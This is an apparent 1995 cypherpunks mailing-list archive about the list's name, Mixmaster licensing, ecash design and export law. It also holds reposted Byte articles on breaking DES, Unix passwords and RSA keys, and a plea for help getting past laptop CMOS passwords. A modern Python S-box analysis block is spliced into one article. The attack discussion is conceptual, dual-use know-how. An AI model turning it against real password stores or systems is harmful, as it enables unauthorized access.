--Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From dcl at panix.com Fri Sep 15 13:36:37 1995 From: dcl at panix.com (David C. Lambert) Date: Fri, 15 Sep 95 13:36:37 PDT Subject: CYPHERPUNK considered harmful Message-ID: <199509152013.QAA18005@panix.com> -----BEGIN PGP SIGNED MESSAGE----- Peter Trei wrote: > Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as > nutcases for many people, and are a barrier to getting our ideas > across. I'm not saying this pigeonholing is correct - in fact I despise > people who judge a book by it's cover, but so many people DO make such > snap judgements that we need to take this into account when talking to > the general public. Two of the responses to the "An opportunity..." post unapologetically admitted that they refused to read the text of the message due to the presence of the word "cypherpunk" in the first sentence. Shows you what we're up against. BTW, I'm not for changing the name of the list, but I do see the logic in a more establishment-friendly name to use when lobbying the public. David C. Lambert dcl at panix.com (finger for PGP public key) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFneAqpplsfgM88VAQE+5wP9GZrIoComyFDeQ6brTLJwZ2oamry3IfC7 XhlqMlAZnC2b1w521nm085nZKtO9/Ru9Fw3BllPinG8nGcBggr9zkH4Ba+Zbezh0 FKK29d7wFGQz1d5JfyYCZhl4dTBdbpnU4jd5Rb27XtvP9livAeR/HIwNAJMccSCX qO/kxlVRRZg= =1Lxr -----END PGP SIGNATURE----- From koontz at MasPar.COM Fri Sep 15 13:36:41 1995 From: koontz at MasPar.COM (David G. 
Koontz) Date: Fri, 15 Sep 95 13:36:41 PDT Subject: SPAM bait Message-ID: <9509152041.AA21715@argosy.MasPar.COM> To: janet.dove at ledip.py Subject: Re: ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Tit From baum at apple.com Fri Sep 15 14:06:33 1995 From: baum at apple.com (Allen J. Baum) Date: Fri, 15 Sep 95 14:06:33 PDT Subject: NTSC version BBC-4 show (cryptography/privacy) Message-ID: I have a copy of the recent BBC 4 show on cryptography & privacy, transferred from PAL to NTSC so it can be watched here. Anyone who wants to borrow it (& lives in the SF Bay area) is welcome to email/call me to arrange to borrow it. ************************************************** * Allen J. Baum tel. (408)974-3385 * * Apple Computer, MS/305-3B fax (408)974-0907 * * 1 Infinite Loop * * Cupertino, CA 95014 baum at apple.com * ************************************************** From jeffb at sware.com Fri Sep 15 14:07:01 1995 From: jeffb at sware.com (Jeff Barber) Date: Fri, 15 Sep 95 14:07:01 PDT Subject: CYPHERPUNK considered harmful In-Reply-To: <199509152013.QAA18005@panix.com> Message-ID: <9509152105.AA18280@wombat.sware.com> David C. Lambert writes: > Peter Trei wrote: > > > Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as > > nutcases for many people, and are a barrier to getting our ideas > > across. > Shows you what we're up against. > > BTW, I'm not for changing the name of the list, but I do see the logic > in a more establishment-friendly name to use when lobbying the public. How about "civil libertarian" then? -- Jeff From loki at obscura.com Fri Sep 15 14:08:11 1995 From: loki at obscura.com (Lance Cottrell) Date: Fri, 15 Sep 95 14:08:11 PDT Subject: Commercial Mixmaster (was Re: Mixmaster status) Message-ID: That is correct. The current code can not be recalled. That is part of why I released it that way. So that I could not be coerced into withdrawing it. 
-Lance

At 12:48 PM 9/15/95, Futplex wrote:
>Anonymous writes:
># Consider this scenario ... Mixmaster gets bought by the Acme
># Crypto Company of Ft. Meade, MD. They "improve" it, and offer a new
># version. It's even FREE (for non-commercial use)! But their
># "improvements" make it incompatible with previous versions, and so
># you have to upgrade. The new "commercial" version comes with no
># SOURCE CODE, of course...
>
>Lance Cottrell writes:
>> 4) There will always be a free version of the client with source code.
>>
>> While I have not discussed it, I can not imagine that there would not also
>> be a free version of the server code (with source). Without remailers what
>> is the point of the client software?
>
>Beyond taking Lance on his PGP-signed-word, which I'm strongly inclined to do,
>I suspect he may not have much legal leeway in this regard.
>
>With the caveat that I Am Not A Lawyer, it seems to me that the GNU General
>Public License (Version 1 from 1989, Mix/GNU.license in the Mixmaster .tar or
>http://hopf.math.nwu.edu/docs/Gnu_License), which covers all extant
>distributions of Mixmaster, has some significant implications for any
>commercial development of Mixmaster. It's applicable to "the Program or any
>derivative work under copyright law: that is to say, a work containing the
>Program or a portion of it, either verbatim or with modifications and/or
>translated into another language".
>
>The GNU GPL specifies that:
>
>  2. You may modify your copy or copies of the Program or any portion of
>  it, and copy and distribute such modifications under the terms of
>  Paragraph 1 above, provided that you also do the following:
>  [...]
>    b) cause the whole of any work that you distribute or publish, that
>    in whole or in part contains the Program or any part thereof, either
>    with or without modifications, to be licensed at no charge to all
>    third parties under the terms of this General Public License (except
>    that you may choose to grant warranty protection to some or all
>    third parties, at your option).
>
>and that:
>
>  3. You may copy and distribute the Program (or a portion or
>  derivative of it, under Paragraph 2) in object code or executable
>  form under the terms of Paragraphs 1 and 2 above provided that you
>  also do one of the following:
>    a) accompany it with the complete corresponding machine-readable
>    source code, [...] or,
>    b) accompany it with a written offer, [...] to give any third party
>    free (except for a nominal charge for the cost of distribution) a
>    complete machine-readable copy of the corresponding source code, [...]
>
>So it looks to me as though Mixmaster source code will continue to be
>legally available, no matter what....
>
>Better informed interpretations are enthusiastically solicited.
>
>-Futplex

----------------------------------------------------------
Lance Cottrell   loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly it flips over,
pinning you underneath. At night the ice weasels come." --Nietzsche
----------------------------------------------------------

From RopeGun at alaska.net Fri Sep 15 14:31:02 1995
From: RopeGun at alaska.net (Oren Tanay)
Date: Fri, 15 Sep 95 14:31:02 PDT
Subject: laptop passwords
Message-ID: <9509152130.AA18053@alaska.net>

I've got a dilemma. 2 laptops that I just purchased at a police auction have passwords, from what I can tell they are passworded at the cmos level.
I would normally just pull out the battery and clear the cmos but these are laptops and I'm not too comfortable about doing that. Any ideas?

laptop1 - Toshiba Satellite Pro T2400CT
laptop2 - Epson Action Note 500 c

Oren Tanay
RopeGun Productions
\\V// o o J +--

From cme at TIS.COM Fri Sep 15 14:33:57 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 15 Sep 95 14:33:57 PDT
Subject: Linking = Showing = Transferring?
In-Reply-To: <199509151834.LAA07925@comsec.com>
Message-ID: <9509152030.AA16183@tis.com>

-----BEGIN PGP SIGNED MESSAGE-----

>>To: cyberia-l at warthog.cc.wm.edu
>>From: tcmay at got.net (Timothy C. May)
>>Subject: Linking = Showing = Transferring?

>>_Linking_ is effectively _showing_, given the point-and-click mechanics of
>>hypertext. This is a situation anticipated by authors (e.g. Ted Nelson),
>>but is now coming to the fore.
>>
>>Granted, providing a link is not the same as actually _including_ the
>>material the link points to, but it is very, very close. Arguably, the
>>same.

There are two important differences.

The first difference is in ownership of the data. If the source of the link decides to clobber the file, then the fact that I have a page with the URL does not guarantee access to that file for the user of *my* page. Similarly, the person owning the file can freely change the content of the file, without my changing the URL which points to it.

The other difference is in handling of the data. If the link were to a pornographic image and someone were to access it through my page's URL, the bits of that image would never touch my computer.

Meanwhile, RSA encryption system in PERL might be a URL which violates US export laws -- if this interpretation were to be taken -- but if so, does it violate them in this mail message? That depends, I suppose, on whether your mail agent is aware of URLs and turns them into point-and-click units. Is it a violation if the URL is printed in a paper magazine?
After all, it's the convenience of the web browser which is at issue. One can invoke netscape with or without a parameter.

Yes -- interesting legal times ahead.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison        cme at acm.org           http://www.clark.net/pub/cme |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man! He's whistling a dirty song.''     |
+----------------------------------------------------------- Jean Ellison -+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFniL1QXJENzYr45AQFlYAP8DGHGk6EEmHXyPbeA7hoZjQ1pkEiyW2xB
1srFbXVsdJt9cwNQbBmFSfKARKVOnh1f+rEEqFZEwXXS1BbwlSljDz/hykZwfQwv
h1kXPvJ9MMqleg6y8IXM5nTL9lKnq+ThKmgl/aciDYZqZ009IL4ssb81gUA5r5lC
mYkfhqulWsU=
=AYRX
-----END PGP SIGNATURE-----

From droelke at rdxsunhost.aud.alcatel.com Fri Sep 15 14:38:20 1995
From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Fri, 15 Sep 95 14:38:20 PDT
Subject: Commercial Mixmaster (was Re: Mixmaster status)
Message-ID: <9509152138.AA02721@spirit.aud.alcatel.com>

> With the caveat that I Am Not A Lawyer, it seems to me that the GNU General
> Public License (Version 1 from 1989, Mix/GNU.license in the Mixmaster .tar or
> http://hopf.math.nwu.edu/docs/Gnu_License), which covers all extant
> distributions of Mixmaster, has some significant implications for any
> commercial development of Mixmaster. It's applicable to "the Program or any
> derivative work under copyright law: that is to say, a work containing the
> Program or a portion of it, either verbatim or with modifications and/or
> translated into another language".
>

Most common mis-understanding about the GPL. If you GPL something, *you* hold the copyright to the material, and can still do anything you want with it. See Perl for a good example - released under an artistic license and under GPL. GPL prevents *others* from making distributions without distributing the source code.
Of course, if you accept GPL'ed patches to your code, the whole thing gets messy, as now you can't claim complete ownership of the entire code base.

I have simplified this - go to gnu.misc.discuss for a complete rehash of this subject every 2-3 weeks.

Dan
------------------------------------------------------------------
Dan Oelke                                   Alcatel Network Systems
droelke at aud.alcatel.com                              Richardson, TX

From greenbes at netcom.com Fri Sep 15 14:45:17 1995
From: greenbes at netcom.com (Steven Greenberg)
Date: Fri, 15 Sep 95 14:45:17 PDT
Subject: CYPHERPUNK harmful. THE TRUTH IS TOLD
In-Reply-To:
Message-ID:

> > But if you and your follows wish to change things, go ahead and have a
> schism. That's what the Protestants did, once they realized the Catholic
> Church wouldn't be changing its system anytime soon.
>
> --Tim May
>

Hmmmm... If memory serves, a year or so ago there was just such a schism when a prominent cypherpunk split off and formed the "cypherWONKS" list. The failure of that list can be attributed to one thing and one thing alone: a concerted effort by YOU and your acolytes against it. You refuse to even mention this, which is all the proof any open-minded person needs. Now you are trying to stifle all open debate by doing it again.

So, Mr. May/Szabo (if that IS your name), why not come clean once and for all about your role in the deaths of Vince Foster and Randy Weaver's wife, and your part in the newly-emerging administration scandal: TENTACLE-gate.

Watch the skies,
Steve

From rsalz at osf.org Fri Sep 15 15:09:43 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 15 Sep 95 15:09:43 PDT
Subject: "Use implies consent to monitoring"
Message-ID: <9509152208.AA09221@sulphur.osf.org>

`h
> Please be advised that use constitutes consent to monitoring

Use of what?

From kelso at netcom.com Fri Sep 15 15:34:56 1995
From: kelso at netcom.com (Tom Rollins)
Date: Fri, 15 Sep 95 15:34:56 PDT
Subject: CYPHERPUNK harmful. THE TRUTH IS TOLD
In-Reply-To:
Message-ID: <199509152231.PAA07080@netcom18.netcom.com>

Steve says:
> Hmmmm... If memory serves, a year or so ago there was just such a schism
> when a prominent cypherpunk split off and formed the "cypherWONKS" list.
> The failure of that list can be attributed to one thing and one thing
> alone: a concerted effort by YOU and your acolytes against it.

EEEK, "cypherWONKS" sounds to me like someone working for Bill Clinton. I believe that Bill and Hillary are the only people that I have heard use this WONK term. Even they didn't like WONKS.

From rsalz at osf.org Fri Sep 15 15:48:04 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 15 Sep 95 15:48:04 PDT
Subject: Commercial Mixmaster (was Re: Mixmaster status)
Message-ID: <9509152246.AA09283@sulphur.osf.org>

>Better informed interpretations are enthusiastically solicited.

Lance owns the code. He can take it, strip off the copyright, and transfer all rights to Bill Gates for a million bucks. He cannot, however, rescind the copyright or licenses that he has previously given out.

/r$

From rsalz at osf.org Fri Sep 15 15:53:00 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 15 Sep 95 15:53:00 PDT
Subject: CYPHERPUNK considered harmful
Message-ID: <9509152251.AA09314@sulphur.osf.org>

What's in a name? That which we call a rose would by any other name still smell as sweet.

Surely, right now, there are more important things to work on.

/r$

From rah at shipwright.com Fri Sep 15 15:53:21 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 15 Sep 95 15:53:21 PDT
Subject: CYPHERPUNK harmful. THE TRUTH IS TOLD
Message-ID:

>Hmmmm... If memory serves, a year or so ago there was just such a schism
>when a prominent cypherpunk split off and formed the "cypherWONKS" list.
>The failure of that list can be attributed to one thing and one thing
>alone: a concerted effort by YOU and your acolytes against it. You refuse
>to even mention this, which is all the proof any open-minded person needs.
>Now you are trying to stifle all open debate by doing it again. So, Mr.
>May/Szabo (if that IS your name), why not come clean once and for all
>about your role in the deaths of Vince Foster and Randy Weaver's wife, and
>your part in the newly-emerging administration scandal: TENTACLE-gate.

Yeah!!!! What he said!!!!

Seriously. It seems to me that if a list of cypher-interested "cryptologists, hackers, and mathematicians" (Copyright, Wall Street Journal), want to call themselves "punks", it's fine by me. Face it folks, people of the "punk" genre have inoculated this particular petri dish. There's enough information-agar to munch on here for quite a while, so it doesn't look like we're going to go anywhere. If some members of this particular community want to bud off, or fission, or spore, or whatever this particular meme does to reproduce, in order to change its name to something reputable, they're welcome to.

Frankly, I find it entertaining to phone up the local internet-hysterical talkshow host's call screener and say, "I'm a cypherpunk, and I disagree with the host". It gets me to the head of the line, even if the innumerate technophobe who's managing the queue couldn't spell "cypher" if he/she/its life depended on it...

So long, and you're welcome for all the fish. Can we get back to c-coding and dissolving reality as we know it, now?

Cheers,
Bob Hettinga
-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From rah at shipwright.com Fri Sep 15 15:53:30 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 15 Sep 95 15:53:30 PDT
Subject: "Use implies consent to monitoring"
Message-ID:

At 6:08 PM 9/15/95, Rich Salz wrote:
>`h
>> Please be advised that use constitutes consent to monitoring
>
>Use of what?
Uh, it looks like the .com registration to me...

Cheers,
Bob Hettinga
-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From szabo at netcom.com Fri Sep 15 16:10:40 1995
From: szabo at netcom.com (Nick Szabo)
Date: Fri, 15 Sep 95 16:10:40 PDT
Subject: why ecash is traceable
Message-ID: <199509152249.PAA18059@netcom.netcom.com>

Hal & Tim have made some interesting comments about payee untraceability. I suspect it will clarify things to point out the orthogonality in two of the major design choices:

* Clearing: Offline vs. online
* Settlement: Deposit to payee's account vs. sending new cash to payee

Because DigiCash wants their product to have payer, but not payee, privacy, the current ecash(tm) software from DigiCash uses online clearing and deposit to payee's account, but the three other combinations are also quite doable if somebody wanted to implement them. The design that allows symmetric untraceability combines online clearing with sending new cash. This way the bank need not ID the payee Bob in order to credit him with the value of the transaction; Bob and the bank can complete the clearing and settlement via anonymous channel. (The bank will also want to receive an anonymous payment from Bob for the service, and Chaum has described a second blinding step the payee must perform for the symmetric case, complications which I won't go into here).

Offline clearing requires the potential to ID the payer in order to punish double-spending after the fact. Online systems without observers (such as ecash(tm)) don't need to worry about trying to find multiple spenders, because this is prevented by the online clearing.
In fact, purposeful second-spending is used to recover from some error conditions, specifically to determine whether the payee in fact received the "coin" or not when there has been a network error in the middle of a transaction. Distinguishing between mistaken and fraudulent double spending is a very complex, not completely tractable problem, so the current ecash(tm) punts it, which is reasonable because it is online. An offline system would need an elaborate blacklisting system as well as active support of law enforcement in all jurisdictions using the ecash, would need to come up with reasonable ways to distinguish between fraudulent and mistaken double-spending, and would need more elaborate and specialized error-recovery protocols.

If hardware "observers", based on "tamper-proof" hardware instead of mathematical protocol, and which prevent double-spending at the source, can be made harder to crack than the maximum a cracked card is allowed to spend, then such small-value transactions might be feasible offline. (This is the major avenue being pursued commercially, because online transactions are perceived to be too expensive, which is false in the case of the Internet IMHO).

Nick Szabo
szabo at netcom.com

From nobody at REPLAY.COM Fri Sep 15 18:07:38 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 15 Sep 95 18:07:38 PDT
Subject: Picking the Crypto Locks
Message-ID: <199509160107.DAA03893@utopia.hacktic.nl>

Byte, October, 1995, pp. 77, 80.

Picking the Crypto Locks

A new technique called differential cryptanalysis can break even DES quickly

By Peter Wayner

How secure is your encrypted data? Advances in mathematics and increased computing power mean you need longer keys and stronger algorithms if you still want to keep your secrets. Both private-key encryption (which uses a single key for coding and decoding) and public-key systems (which use separate keys for encryption and decryption) are increasingly vulnerable to determined attack.
But do these weaknesses represent a real threat to encrypted data, or are they still just intriguing research results?

Unfortunately, when we try to assess the effectiveness of today's popular cryptographic systems, we run into a problem of mathematical ignorance. Most people who are familiar with mathematics can work in two directions, forward and backward, like the simple algebraic equation a = b + 1. We can determine the value of the first variable from that of the second and vice versa. Crypto systems, however, generally rely on mathematics that works only in one direction. People assume these systems are secure because no one has yet shown how to work the mathematics backward and break open the message.

In general, we determine the strength of most cryptographic systems by seeing how well they avoid the attacks we know have been used on other systems. If none of the past attacks seems to work, then we deem a system secure. For now.

Let's look at how today's codebreakers work, the resources and time they need, and what we require in the way of new systems and longer keys.

Recent assessments of the strength of private-key crypto systems involve looking for theoretical holes and measuring the time needed for a brute-force attack. Finding the holes can be devilishly hard, calling for deep mathematical insights. Brute-force attacks are easier to mount if enough computational hardware is available, but they're also easy to defend against.

The most important development in the realm of data encryption in recent years is Eli Biham and Adi Shamir's differential cryptanalysis. They showed how to mount a limited attack on today's most widely used cryptosystem, DES (the federal Data Encryption Standard), which is also the basis for Unix's password system.

Imagine that you had access to your victim's DES cipher "box" (the common term for an enciphering system) with preloaded keys.
Your goal is to determine the 56-bit key, so that you can decrypt the other messages your victim had encrypted with the box. Biham and Shamir showed that you could infer the hidden key if you could pass 2^47 messages through the box and observe what came out. This chosen plaintext attack builds up a statistical model of the cipher, and it needs this many plaintexts to produce an answer with confidence.

Most intriguing, this work exposed flaws in many DES substitutes. Because the U.S. government classified the details behind DES's design, many assumed that there might be a trapdoor through which the government could eavesdrop. To circumvent these potential trapdoors, some folks designed their own variations of DES. Most of these new ciphers, however, fall even faster to Biham and Shamir's mathematical machinery. FEAL-4, a faster replacement, for example, takes only four well-chosen plaintexts.

_______________________________________________________
Strengths and Weaknesses of Crypto Algorithms
_______________________________________________________
Algorithm   Comment          Strengths        Weaknesses
_______________________________________________________
DES         Standard,        Long-tested      Has yielded
            widely                            to DC
            accepted
_______________________________________________________
FEAL-4      DES substitute                    Easily broken
                                              by DC
_______________________________________________________
GDES        DES-like,                         Easily broken
            new DES                           by DC
_______________________________________________________
Khufu       DES-like         Secure           New, unknown
                             against DC
_______________________________________________________
Blowfish    DES-like         Secure           New, unknown
                             against DC
_______________________________________________________
RC-4        Proprietary      Variable-        Unknown
                             length key
_______________________________________________________
RSA         Widely used      Long-tested      Vulnerable to
            public key                        advances in
                                              factoring
_______________________________________________________
Skipjack    Classified       Considered       Algorithm must
                             strong           remain secret
                                              to preserve
                                              law-enforcement
                                              trapdoor
_______________________________________________________
DC = differential cryptanalysis
_______________________________________________________

Recently, the IBM scientists who originally designed DES revealed that they anticipated Biham and Shamir's attack and optimized DES to resist it. Because other nongovernment cryptographers didn't know about this attack, they couldn't design their software to resist it. Now the information is public, and there are new ciphers that hold up well against these attacks. Ralph Merkle's Khufu and Bruce Schneier's Blowfish are two private-key ciphers that are similar to DES but resist differential cryptography. They do this by creating new S-boxes for each encryption, using the key to randomize them. (S-boxes are the essential scrambling elements of DES-like ciphers. Think of them as lookup tables or nonlinear functions; their outputs should be as random as possible.) Differential cryptanalysis works only if the attacker knows what's in the S-boxes.

This work also revealed some stunning counterintuitive results. Key length is usually taken as a rough measure of a system's security. DES uses 56-bit keys; a brute-force attacker might need to try all 2^56 keys to find the right one. A longer key would mean a longer brute-force attack. However, Biham and Shamir showed that even if DES used longer keys, it would hardly be any stronger against differential cryptanalysis. The statistical model would still be solvable if DES used the maximum of 768 bits.

Applying this knowledge to other types of ciphers is tricky. RSA Data Security markets a proprietary algorithm called RC-4 that accepts a variable-length key; this algorithm is used in many products. The flexible key length can be an advantage in some situations. For example, the government allows general export of software using RC-4 with a 40-bit key, but similar software using a longer key must stay within the U.S.
While we don't know if differential cryptanalysis can be applied to RC-4 directly, because of the algorithm's proprietary nature, the results with DES suggest that more key is not necessarily stronger.

Men and Machines

Mathematical tools like differential cryptanalysis can be the most powerful attack against a cipher system. Brute-force attacks are normally a last resort, rare in practice because cipher designers routinely use long key lengths specifically to preclude them. But times are changing. We're reaching a point at which a large machine can quickly search the entire keyspace of DES. DES is still in wide use; it's been the commercial and governmental standard for nearly two decades. Replacing such standards can be a painfully slow process. DES users should be thinking about what can be done with off-the-shelf hardware.

Brute-force attacks simply use large machines that try all possible passwords in parallel. It's even possible to produce native chips that run DES. Michael Wiener of Bell Northern Research described how to build a $1 million machine using a pipelined DES processor that could cruise through all possible keys in about 7 hours.

Massively parallel machines can also attack the problem. Some of the most promising emerging machines distribute small, 1-bit processors directly onto the memory chips. Some have 1024 processors on a chip with 42 bits of memory per processor. (Before it entered Chapter 11, Cray Computer was building for the National Security Agency a special Cray 3 with such processor-embedded memory.) In 1992 I designed a machine using 1 million associative processor memory chips (standard DRAM densities) from Coherent Research (Syracuse, NY) that could attack all of DES in one day. This machine could be reprogrammed to attack other DES-like ciphers. Linden Technology (Austin, TX) is currently exploring manufacturing new 4-Mb DRAMs with the 1024 associative processors built onto the chip.
The effect of brute-force attacks on DES is also important for Unix security, which stores each password after passing it through DES 25 times. At log-in, you type your password; it's encrypted 25 times and the result compared against the password file. If it matches, the system grants you access. Because the password file doesn't contain the passwords themselves, unauthorized users can't use the file to recover them directly. They must use a brute-force machine.

However, the brute-force attack can be relatively successful against Unix, because the keyspace is smaller. Most users limit their passwords to alphabetic characters, occasionally adding numbers. This makes searching for passwords much faster; it could be done quite quickly with an associative-memory parallel processor. One estimate suggests that a computer using 512 of Linden's chips could test all six-character alphanumeric passwords in 15 minutes.

Clearly, the Unix password structure needs to be rethought in light of today's machines and code-breaking techniques. Because of this new vulnerability, you may want to explore other, newer ciphers, such as Merkle's Khufu or Schneier's Blowfish.

The classified Skipjack algorithm buried inside the U.S. government's Clipper and Capstone encryption chips also uses S-boxes, but little is known about their design. There's little reliable public information about RSA Data Security's RC-4. Anyone who uses these algorithms must be prepared to trust the wits of the designers, because the algorithms have not undergone the intensely thorough and long-time public scrutiny given to DES.

Many organizations have opted to continue with DES, but the current state of the art is triple-DES -- three passes of the algorithm with either 112- or 168-bit keys. This effectively guards against both brute-force and differential analysis attacks. These users can rest assured that, paradoxically, all the attacks focused on DES continue to keep it strong.
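The article's two claims about S-boxes, that they decide a DES-like cipher's resistance to differential cryptanalysis and that the attack only works when the attacker knows their contents, can be checked with the difference distribution table a designer computes for each S-box. The Python below is an added example, not part of the Byte article or of any cipher it names: it builds the table for DES's published S1, reports the best one-round differential, and shows that the same differential carries no predictable probability on a hypothetical key-derived S-box (the key-seeded shuffle in keyed_sbox is a stand-in for how Khufu and Blowfish derive their tables, not either cipher's real key schedule).

```python
"""Difference distribution table (DDT) of a DES S-box, the statistic behind
differential cryptanalysis and the tool designers use to resist it."""
import hashlib
import random

# DES S-box S1 as published in FIPS 46: 4 rows x 16 columns of 4-bit outputs.
S1 = [
    [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7],
    [0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8],
    [4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0],
    [15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13],
]


def sbox_lookup(table, x):
    """DES convention for a 6-bit input: the outer bits select the row, the
    middle four bits the column."""
    row = ((x >> 5) & 1) << 1 | (x & 1)
    col = (x >> 1) & 0xF
    return table[row][col]


def flatten(table):
    """Rewrite the 4x16 table as a 64-entry list indexed directly by the 6-bit input."""
    return [sbox_lookup(table, x) for x in range(64)]


def difference_distribution_table(sbox):
    """ddt[din][dout] counts inputs x with S(x) ^ S(x ^ din) == dout.

    Every row sums to 64 and every entry is even (x and x^din pair up).
    A large entry for din != 0 is exactly what a differential attacker exploits."""
    ddt = [[0] * 16 for _ in range(64)]
    for din in range(64):
        for x in range(64):
            ddt[din][sbox[x] ^ sbox[x ^ din]] += 1
    return ddt


def best_differential(ddt):
    """Most likely (din, dout, count) with din != 0: the attacker's best
    one-round characteristic through this S-box."""
    best = (0, 0, 0)
    for din in range(1, 64):
        for dout in range(16):
            if ddt[din][dout] > best[2]:
                best = (din, dout, ddt[din][dout])
    return best


def differential_probability(sbox, din, dout):
    """Fraction of the 64 inputs for which the differential din -> dout holds."""
    hits = sum(1 for x in range(64) if sbox[x] ^ sbox[x ^ din] == dout)
    return hits / 64


def keyed_sbox(key: bytes):
    """Hypothetical key-dependent S-box (an assumption for this example, not
    Khufu's or Blowfish's construction): the 64 outputs of S1 are permuted by a
    shuffle seeded from a hash of the key, so an attacker who knows only the
    public S1 is working from the wrong distribution table."""
    seed = int.from_bytes(hashlib.sha256(key).digest()[:8], "big")
    table = flatten(S1)
    random.Random(seed).shuffle(table)
    return table


if __name__ == "__main__":
    public = flatten(S1)
    din, dout, count = best_differential(difference_distribution_table(public))
    print(f"S1: best differential {din:#04x} -> {dout:#03x} holds for {count}/64 inputs")
    secret = keyed_sbox(b"constructed demo key")   # constructed sample key
    print("same differential on the key-derived S-box:",
          f"{differential_probability(secret, din, dout) * 64:.0f}/64")
```

The 16/64 figure for S1 is the kind of bias a DES designer deliberately capped (no entry above 16 for a nonzero input difference); a designer evaluating a new S-box runs the same table and rejects candidates with larger peaks.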
-----
Peter Wayner is a BYTE consulting editor living in Baltimore, MD. You can reach him on the Internet at pcw at access.digex.net, on BIX as pwayner at bix.com, or on the World Wide Web at http://access.digex.net/~pcw/pcwpage.html.
-----

Byte, October, 1995, p. 78.

Factoring in Public-Key's Future

Long thought nearly unbreakable, public-key cryptography is yielding to attack. The secret of security here is key length.

By Bruce Schneier

Factoring large numbers is hard but not as hard as it used to be. This has grave implications for the effectiveness of public key cryptography, which relies on the difficulty of factoring long keys for its security. But how long is long enough?

In 1976, Richard Guy wrote: "I shall be surprised if anyone regularly factors numbers of size 10^80 without special form during the present century." In 1977, Ron Rivest said that factoring a 125-digit number would take 40 quadrillion years. In 1994, a 129-digit number was factored. The lesson here is that making predictions is foolish.

Today, 512-bit keys are common. Factoring them, thus destroying their security, is well within the range of possibility for today's computing resources. A weekend-long worm on the Internet could do it.

Computing power is measured in MIPS-years: a million-instructions-per-second computer running for one year, or about 3 x 10^13 instructions. A 100-MHz Pentium is about a 50-MIPS machine; a 1600-node Intel Paragon is about 50,000 MIPS.

In 1983, a Cray X-MP supercomputer factored a 71-digit number in 0.1 MIPS-years, using 9.5 CPU hours. That's expensive. Factoring the 129-digit number in 1994 required 5000 MIPS-years and used the idle time on 1600 computers around the world over an eight-month period. Although it took longer, it was essentially free.

Those two computations used what's called the *quadratic sieve*, but a newer, more powerful algorithm has arrived.
The *general number field sieve* is faster than the quadratic sieve for numbers well below 116 digits and can factor a 512-bit number over 10 times faster -- it would take less than a year to run on an 1800-node Intel Paragon.

And the process gets still faster. Mathematicians keep coming up with new tricks, new optimizations, and new techniques. A related algorithm, the special number field sieve, can already factor numbers of a specialized form (not generally used for cryptography) much faster. So we can probably optimize the general number field sieve to run that fast. For all we know, the National Security Agency is already doing it.

The figure "MIPS Years Needed to Factor" gives the number of MIPS-years required to factor "special" and "general" numbers of different lengths.

How Big Is Big Enough?

The wise cryptographer is ultraconservative when choosing key lengths for a public-key system. You must consider the intended security, the key's expected lifetime, and the current state of the factoring art. Now you need a 1024-bit number to get the same security you got from a 512-bit number in the early 1980s. If you want your keys to remain secure for 20 years, 1024 bits is probably too short.

Consider these assumptions from the mathematicians who factored RSA-129:

  We believe we could acquire 100,000 machines without superhuman or unethical efforts and without an Internet worm or virus. Many organizations have several thousand machines on the Net. Using their facilities would require diplomacy but should not be impossible. Assuming an average power of 5 MIPS and one year elapsed time, we could reasonably embark on a project that would require half a million MIPS-years.

The project to factor the 129-digit number harnessed an estimated 0.03 percent of the Internet's total computing power. A well-publicized project might be able to harness 2 percent of the world's computing power for a year.
My recommendations for public-key lengths are given in the figure "Recommended Public-Key Key Lengths" according to how long you require the key to be secure. There are three key lengths given for each period -- one secure against an individual cryptanalyst who can get his hands on 10,000 MIPS-years, one against a major corporation that could harness 10^7 MIPS-years, and the third secure against a major government and 10^9 MIPS-years. These figures assume that computing power will increase by a factor of 10 every five years and that mathematical advances will let us factor numbers at the speeds of the special number field sieve.

Not everyone will agree with these final recommendations. The National Institute of Standards and Technology has mandated 512- to 1024-bit keys for its Digital Signature Standard. PGP has a maximum RSA key length of 1280 bits. Arjen Lenstra, the world's most successful factorer, refuses to predict beyond 10 years.

There's always the possibility that an advance in factoring will surprise me as well, though I tried to factor everything into my calculations. But why trust me? I just proved my own foolishness by making predictions.
